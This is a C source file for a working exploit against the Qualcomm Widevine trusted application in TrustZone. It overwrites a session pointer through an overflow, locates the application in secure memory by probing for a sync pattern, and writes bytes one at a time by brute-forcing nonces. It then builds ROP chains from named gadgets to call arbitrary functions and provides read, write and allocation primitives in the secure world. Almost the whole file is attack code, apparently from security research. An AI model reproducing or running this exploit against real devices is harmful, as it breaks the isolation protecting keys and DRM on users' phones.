#include <stdio.h>
#include <string.h>
#include <errno.h>
#include "exploit_utilities.h"
#include "QSEEComAPI.h"
#include "widevine_commands.h"
#include "symbols.h"
#include "defs.h"
#include "vuln.h"

/**
 * The physical address of the request buffer.
 *
 * Zero means "not yet known": execute_function() tests this value and, while
 * it is zero, sends an extra command and stores the first DWORD of the
 * response buffer here.
 */
int g_request_buffer_physical_address = 0;

/**
 * A flag indicating if the pivot gadget has been written.
 *
 * execute_function() sets this to 1 after writing the pivot function pointer,
 * so the write is only performed on the first call.
 */
int g_wrote_pivot_address = 0;

/**
 * Checks whether the page at the given address carries the sync pattern.
 *
 * For each element of g_sync_pattern the session pointer is redirected so that
 * the key-derivation command probes that element, and the probe outcome is
 * compared with what the pattern expects: a pattern entry equal to 1 must
 * yield ONE_RESULT, any other entry must yield NON_ONE_RESULT.
 *
 * @param handle The handle used to communicate with the application.
 * @param addr   The address of the page to probe.
 * @return PAGE_MARKED if every element matched, PAGE_NOT_MARKED on the first
 *         mismatch, PAGE_INVALID if the probe returned 0 (treated as a crash;
 *         the application is restarted) or an unrecognised result.
 */
int is_marked_page(struct qcom_wv_handle* handle, uint32_t addr) {

	//Going over each element in the sync pattern
	for (uint32_t i=0; i<sizeof(g_sync_pattern)/(2*sizeof(uint32_t)); i++) {

		//Trying to overwrite the session pointer so that we'll probe the i-th element in the sync pattern
		overwrite_session_pointer(handle, 0, addr + START_OVERFLOW_OFFSET - DERIVE_KEY_PROBE_OFFSET + i*4);
		int derive_res = derive_keys_from_session_key(handle, 0, 1, 1, 1);

		//Did we crash?
		if (derive_res == 0) {
			(*handle->QSEECom_shutdown_app)((struct QSEECom_handle **)&handle->qseecom);
			(*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
										  WIDEVINE_PATH, WIDEVINE_APP_NAME, WIDEVINE_BUFFER_SIZE);
			return PAGE_INVALID;
		}

		//Anything other than a "one" or "non-one" result cannot be interpreted
		if (derive_res != ONE_RESULT && derive_res != NON_ONE_RESULT) {
			printf("[-] Unknown deriviation result: %d, aborting!\n", derive_res);
			return PAGE_INVALID;
		}

		//The probe matches when "pattern entry is one" agrees with "result is one".
		//Note: the comparison is made on the pattern entry itself; a leading '!'
		//would bind tighter than '==' and invert the test.
		int expect_one = (g_sync_pattern[2*i] == 1);
		int got_one = (derive_res == ONE_RESULT);
		if (expect_one != got_one) {
			printf("[-] Sync element pattern mismatch\n");
			return PAGE_NOT_MARKED;
		}
		printf("[+] Match sync pattern element %u\n", (unsigned int)i);
	}
	return PAGE_MARKED;
}

/**
 * Searches the secure app region for the application using the sync pattern.
 *
 * The region is first sampled in DATA_SEGMENT_OFFSET strides. Once a probe
 * does not return 0 (i.e. is not treated as a crash), pages are scanned one by
 * one (0x1000 apart) with is_marked_page() until the pattern is found or the
 * scan reports PAGE_INVALID, in which case the coarse stride resumes from the
 * current position.
 *
 * @param handle The handle used to communicate with the application.
 * @return The marked page's address minus DATA_SEGMENT_OFFSET, or NULL if the
 *         end of the region was reached without a match.
 */
void* find_widevine_application(struct qcom_wv_handle* handle) {

	uint32_t candidate;

	for (candidate = SECURE_APP_REGION_START + DATA_SEGMENT_OFFSET;
		 candidate < SECURE_APP_REGION_END;
		 candidate += DATA_SEGMENT_OFFSET) {

		//Coarse probe: is anything mapped at this address?
		printf("[+] Trying to probe 0x%08X\n", candidate);
		overwrite_session_pointer(handle, 0, candidate);

		if (derive_keys_from_session_key(handle, 0, 1, 1, 1) == 0) {
			//A zero result is treated as a crash: restart the application and move on
			printf("[+] Crashed, jumping ahead\n");
			(*handle->QSEECom_shutdown_app)((struct QSEECom_handle **)&handle->qseecom);
			(*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
										  WIDEVINE_PATH, WIDEVINE_APP_NAME, WIDEVINE_BUFFER_SIZE);
			continue;
		}
		printf("[+] Didn't crash, starting to scan linearly\n");

		//Fine scan: walk page by page from here
		for (;;) {
			printf("[+] Scanning page %08X for sync pattern\n", candidate);
			int scan_result = is_marked_page(handle, candidate);

			if (scan_result == PAGE_INVALID) {
				//Fall back to the coarse stride (the outer loop adds DATA_SEGMENT_OFFSET)
				printf("[+] Crashed in linear scan, jumping ahead\n");
				break;
			}

			if (scan_result != PAGE_NOT_MARKED) {
				//Found the sync pattern!
				printf("[+] Found!\n");
				return (void*)(candidate - DATA_SEGMENT_OFFSET);
			}

			printf("[+] Not a marked page, continuing to scan\n");
			candidate += 0x1000;
		}
	}

	return NULL;
}

/**
 * Writes a DWORD to the given address one byte at a time, lowest byte first,
 * by repeatedly generating nonces at the target until the low byte of the
 * generated nonce equals the wanted byte.
 *
 * NOTE(review): each nonce appears to be a full 32-bit value written at
 * addr + i, so bytes following the one being set are presumably overwritten
 * as well (hence "messy") - confirm against generate_nonce.
 *
 * @param handle The handle used to communicate with the application.
 * @param val    The value to write.
 * @param addr   The address to write the value to.
 */
void write_dword_messy(struct qcom_wv_handle* handle, uint32_t val, uint32_t addr) {

	for (int byte_idx = 0; byte_idx < (int)sizeof(uint32_t); byte_idx++) {

		const uint8_t target_byte = (val >> (byte_idx*8)) & 0xFF;
		uint32_t nonce;

		do {
			//The session pointer is rewritten before every attempt: nonce generation
			//is limited by a counter (16 calls), and that counter lies within the
			//data overwritten by the overflow, so rewriting the pointer resets it
			overwrite_session_pointer(handle, 0, addr + byte_idx - NONCE_GENERATION_OFFSET);

			//Generating a random value into the target location
			generate_nonce(handle, 0, &nonce);

		} while ((uint8_t)(nonce & 0xFF) != target_byte);

		printf("[+] Got a byte!\n");
	}
}

int execute_function(struct qcom_wv_handle* handle, void* app, uint32_t function_address, uint32_t arg1, uint32_t arg2, uint32_t arg3, uint32_t arg4) {
	
	//Initializing the request and response buffers
	uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000); //BUGFIX: Need a large size for functions that use a lot of stack space!
												   //This also means all the offsets must be into the "middle" of this buffer
												   //rather than the end, to allow to stack to expand in that direction
	uint32_t cmd_resp_size = QSEECOM_ALIGN(0x400);
	uint32_t* cmd_req = malloc(cmd_req_size);
	uint32_t* cmd_resp = malloc(cmd_resp_size);
	memset(cmd_req, 0, cmd_req_size);
	memset(cmd_resp, 0, cmd_resp_size);
	
	int res;

	if (!g_request_buffer_physical_address) {
	
		//Setting the request code
		cmd_req[0] = wrapper_get_hdcp_capability;
	
		//First, writing a gadget which'll give us the physical address of R0 in the response buffer
		//This is so that we can later pivot to this address as a stack
		uint32_t wanted_target_ptr = (uint32_t)app + STR_R0_R1_BX_LR_OFFSET;
		uint32_t overwrite_address = (uint32_t)app + DATA_SEGMENT_OFFSET + OVERWRITE_FUNCTION_POINTER_OFFSET;
		write_dword_messy(handle, wanted_target_ptr, overwrite_address);
		write_dword_messy(handle, 0x80004, overwrite_address + sizeof(uint32_t));
	
		//Executing the function to get the physical address of the buffer
		res = (*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
		if (res < 0) {
			free(cmd_req);
			free(cmd_resp);
			perror("[-] Unable to enable clks");
			return -errno;
		}
	
		res = (*handle->QSEECom_send_cmd)(handle->qseecom,
										  cmd_req,
										  cmd_req_size,
										  cmd_resp,
										  cmd_resp_size);
	
		if ((*handle->QSEECom_set_bandwidth)(handle->qseecom, false)) {
			perror("[-] Import key command: (unable to disable clks)");
		}
	
		g_request_buffer_physical_address = cmd_resp[0];
		printf("[+] Request buffer physical address: 0x%08X\n", g_request_buffer_physical_address);
	}

	if (!g_wrote_pivot_address) {
		//Writing the function pointer to the gadget which pivots using our request buffer
		uint32_t wanted_target_ptr = (uint32_t)app + STR_R0_R1_BX_LR_OFFSET;
		uint32_t overwrite_address = (uint32_t)app + DATA_SEGMENT_OFFSET + OVERWRITE_FUNCTION_POINTER_OFFSET;
		wanted_target_ptr = (uint32_t)app + LDM_R0_R0_R2_R3_IP_SP_LR_PC_OFFSET;
		write_dword_messy(handle, wanted_target_ptr, overwrite_address);
		write_dword_messy(handle, 0x80004, overwrite_address + sizeof(uint32_t));

		g_wrote_pivot_address = 1;
	}

	//Writing the values which are popped off of the request buffer in the initial pivot
	uint32_t idx = 0;
	cmd_req[idx++] = wrapper_get_hdcp_capability;
	cmd_req[idx++] = GARBAGE_VALUE;													//R2
	cmd_req[idx++] = GARBAGE_VALUE;													//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//IP
	cmd_req[idx++] = g_request_buffer_physical_address + CRAFTED_STACK_OFFSET;		//SP
	cmd_req[idx++] = GARBAGE_VALUE;													//LR
	cmd_req[idx++] = (uint32_t)app + POP_R0_R1_R3_PC_OFFSET;						//PC
	
	//Moving to the location of the crafted stack!
	idx = (CRAFTED_STACK_OFFSET / sizeof(uint32_t));

	//Start of our crafted stack!
	//Setting R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R0
	cmd_req[idx++] = arg2;															//R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R3

	//Setting R0, R2, R3
	cmd_req[idx++] = (uint32_t)app + POP_R0_R2_R3_R4_PC_OFFSET;						//PC
	cmd_req[idx++] = arg1;															//R0
	cmd_req[idx++] = arg3;															//R2
	cmd_req[idx++] = arg4;															//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//R4

	//Setting IP for the call
	cmd_req[idx++] = (uint32_t)app + POP_R4_R6_R9_FP_IP_PC_OFFSET;					//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R6
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET;							//R9
	cmd_req[idx++] = GARBAGE_VALUE;													//FP
	cmd_req[idx++] = function_address;												//IP

	//Jumping to the function!
	cmd_req[idx++] = (uint32_t)app + POP_R4_R5_R6_LR_BX_IP_OFFSET;					//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R6

	//Saving the return value in the version field in the application's data segment
	cmd_req[idx++] = (uint32_t)app + POP_R1_R3_R5_R7_PC_OFFSET;						//LR
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET + 556 - 520;				//R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R7
	cmd_req[idx++] = (uint32_t)app + STR_R0_R1_520_POP_R4_R5_R6_PC_OFFSET;			//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R6

	//Popping the stack pointer to the original location
	uint32_t stack_location_for_r0 = g_request_buffer_physical_address + (idx + 10)*4;
	cmd_req[idx++] = (uint32_t)app + POP_R0_R1_R3_PC_OFFSET;						//PC
	cmd_req[idx++] = stack_location_for_r0;											//R0 
	cmd_req[idx++] = GARBAGE_VALUE;													//R1 
	cmd_req[idx++] = GARBAGE_VALUE;													//R3 

	//Building the R0 values acting as a stack
	cmd_req[idx++] = (uint32_t)app + LDMDB_R0_R4_IP_SP_LR_PC_OFFSET;				//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//IP
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET + CALC_STACK_TOP_OFFSET;	//SP
	cmd_req[idx++] = GARBAGE_VALUE;													//LR
	cmd_req[idx++] = (uint32_t)app + MAIN_LOOP_RET_OFFSET;							//PC

	res = (*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
	if (res < 0) {
		free(cmd_req);
		free(cmd_resp);
		perror("[-] Unable to enable clks");
		return -errno;
	}

	res = (*handle->QSEECom_send_cmd)(handle->qseecom,
									  cmd_req,
									  cmd_req_size,
									  cmd_resp,
									  cmd_resp_size);

	if ((*handle->QSEECom_set_bandwidth)(handle->qseecom, false)) {
		perror("[-] Import key command: (unable to disable clks)");
	}

	//Freeing the buffers allocated
	free(cmd_req);
	free(cmd_resp);

	//Returning the value which was written into the version field
	return send_cmd_1026(handle);

}

/**
 * Writes a DWORD by invoking the code at app + WRITE_DWORD_OFFSET through
 * execute_function(), with the value as the first argument and the address as
 * the second. The result of the call is discarded.
 *
 * @param handle  The handle used to communicate with the application.
 * @param app     The base address of the application.
 * @param value   The DWORD to write.
 * @param address The address to write to.
 */
void write_dword(struct qcom_wv_handle* handle, void* app, uint32_t value, uint32_t address) {
	const uint32_t writer_address = (uint32_t)app + WRITE_DWORD_OFFSET;

	(void)execute_function(handle, app, writer_address, value, address, 0, 0);
}

/**
 * Writes a buffer of arbitrary length to the given address.
 *
 * Whole DWORDs are written with write_dword(); the remaining 0-3 bytes are
 * written one at a time by invoking the code at app + STRB_R0_R2_BX_LR_OFFSET
 * with the byte as the first argument and the destination as the third.
 *
 * @param handle  The handle used to communicate with the application.
 * @param app     The base address of the application.
 * @param address The destination address.
 * @param data    The source buffer (no alignment requirement).
 * @param length  The number of bytes to write.
 */
void write_range(struct qcom_wv_handle* handle, void* app, uint32_t address, void* data, uint32_t length) {

	const uint8_t* bytes = data;
	const uint32_t dword_count = length / sizeof(uint32_t);

	//Byte offset at which the trailing (non-DWORD) bytes start
	const uint32_t tail_start = dword_count * sizeof(uint32_t);

	//Writing all the DWORDs in the buffer
	for (uint32_t i = 0; i < dword_count; i++) {
		//memcpy avoids dereferencing a possibly misaligned uint32_t pointer
		uint32_t dword;
		memcpy(&dword, bytes + i*sizeof(uint32_t), sizeof(dword));
		write_dword(handle, app, dword, address + i*sizeof(uint32_t));
	}

	//Writing the remaining bytes. The offset is already expressed in bytes, so
	//it is added to the destination as-is (no further scaling by the DWORD size)
	for (uint32_t offset = tail_start; offset < length; offset++) {
		execute_function(handle,
						 app,
						 (uint32_t)app + STRB_R0_R2_BX_LR_OFFSET,
						 bytes[offset],
						 0,
						 address + offset,
						 0);
	}

}

/**
 * Reads a DWORD by invoking the code at app + READ_DWORD_OFFSET through
 * execute_function(), with the address as the first argument.
 *
 * @param handle  The handle used to communicate with the application.
 * @param app     The base address of the application.
 * @param address The address to read from.
 * @return The result of execute_function(), converted to uint32_t.
 */
uint32_t read_dword(struct qcom_wv_handle* handle, void* app, uint32_t address) {
	const uint32_t reader_address = (uint32_t)app + READ_DWORD_OFFSET;
	int result = execute_function(handle, app, reader_address, address, 0, 0, 0);

	return result;
}

/**
 * Invokes the code at app + MALLOC_OFFSET through execute_function(), with the
 * requested size as the first argument.
 *
 * @param handle The handle used to communicate with the application.
 * @param app    The base address of the application.
 * @param size   The size passed to the invoked function.
 * @return The result of execute_function(), converted to uint32_t
 *         (presumably the address of the allocation - confirm against the
 *         function at MALLOC_OFFSET).
 */
uint32_t tz_malloc(struct qcom_wv_handle* handle, void* app, uint32_t size) {
	const uint32_t allocator_address = (uint32_t)app + MALLOC_OFFSET;
	int result = execute_function(handle, app, allocator_address, size, 0, 0, 0);

	return result;
}
